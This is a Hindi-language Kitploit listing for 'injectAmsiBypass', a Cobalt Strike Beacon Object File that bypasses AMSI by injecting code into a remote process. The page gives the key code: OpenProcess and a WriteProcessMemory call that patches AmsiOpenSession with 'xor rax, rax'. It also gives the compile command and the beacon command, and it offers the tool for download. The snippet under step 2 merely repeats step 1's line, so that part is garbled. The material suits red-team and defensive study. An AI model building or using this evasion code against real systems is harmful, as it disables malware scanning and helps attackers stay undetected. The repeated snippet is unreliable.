Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
injectAmsiBypass — Cobalt Strike BOF - रिमोट प्रक्रिया में कोड इंजेक्शन के साथ AMSI को बायपास करें। | Kitploit
उपकरण/GitHubGitHub/boku7/injectamsibypass
शोषण फ्रेमवर्कपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubboku7/injectamsibypass

injectAmsiBypass

Cobalt Strike BOF - रिमोट प्रक्रिया में कोड इंजेक्शन के साथ AMSI को बायपास करें।

रिपॉजिटरी देखें
380693 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cobalt Strike BOF - Inject AMSI Bypass

Cobalt Strike बीकन ऑब्जेक्ट फ़ाइल (BOF) जो कोड इंजेक्शन के साथ रिमोट प्रक्रिया में AMSI को बायपास करती है।

CobaltStrike से inject-amsiBypass BOF चलाना

यह क्या करता है?

1. रिमोट प्रक्रिया पर हैंडल प्राप्त करने के लिए दिए गए PID तर्क का उपयोग करें
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. बीकन की मेमोरी में AMSI.DLL लोड करें और AMSI.AmsiOpenSession का पता प्राप्त करें
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
  • बीकन और लक्ष्य प्रक्रिया दोनों के पास प्रतीक के लिए समान पता होगा।
  • यदि रिमोट प्रक्रिया में AMSI.DLL मौजूद नहीं है, तो इसे चलाने से लक्ष्य प्रक्रिया क्रैश हो सकती है।
3. AMSI बायपास को रिमोट प्रक्रिया की मेमोरी में लिखें
root@kitploit:~
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

विधि = AMSI.AmsiOpenSession

  • Offensive Security के PEN-300/OSEP (एवेज़न तकनीक और बचाव भेदन) पाठ्यक्रम में सिखाई गई AMSI बायपास तकनीक का उपयोग करता है।
    • https://www.offensive-security.com/pen300-osep/

प्रूफ ऑफ कॉन्सेप्ट डेमो स्क्रीनशॉट

पहले - Powershell.exe AMSI.AmsiOpenSession

बाद में - Powershell.exe AMSI.AmsiOpenSession

x64 MinGW के साथ संकलन:

root@kitploit:~
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

Cobalt Strike बीकन कंसोल से चलाएं

root@kitploit:~
beacon> inject-amsiBypass <PID>
  • inject-amsiBypass.cna स्क्रिप्ट को Cobalt Strikes स्क्रिप्ट मैनेजर में लोड करना सुनिश्चित करें

करने की सूची

  • इंजेक्शन से पहले जांचें कि रिमोट प्रक्रिया में AMSI.DLL मौजूद है या नहीं
  • इंजेक्ट करने के लिए अन्य AMSI बायपास जोड़ें
  • x86 का समर्थन करें

क्रेडिट / संदर्भ

Raphael Mudge - बीकन ऑब्जेक्ट फ़ाइलें - Luser डेमो
  • https://www.youtube.com/watch?v=gfYswA_Ronw
Cobalt Strike - बीकन ऑब्जेक्ट फ़ाइलें
  • https://www.cobaltstrike.com/help-beacon-object-files
BOF कोड संदर्भ
ajpc500/BOFs
  • https://github.com/ajpc500/BOFs/
trustedsec/CS-Situational-Awareness-BOF
  • https://github.com/trustedsec/CS-Situational-Awareness-BOF
Sektor7 मैलवेयर डेवलपमेंट एसेंशियल्स पाठ्यक्रम
  • https://institute.sektor7.net/red-team-operator-malware-development-essentials
Offensive Security OSEP
  • https://www.offensive-security.com/pen300-osep/
टूल डाउनलोड करें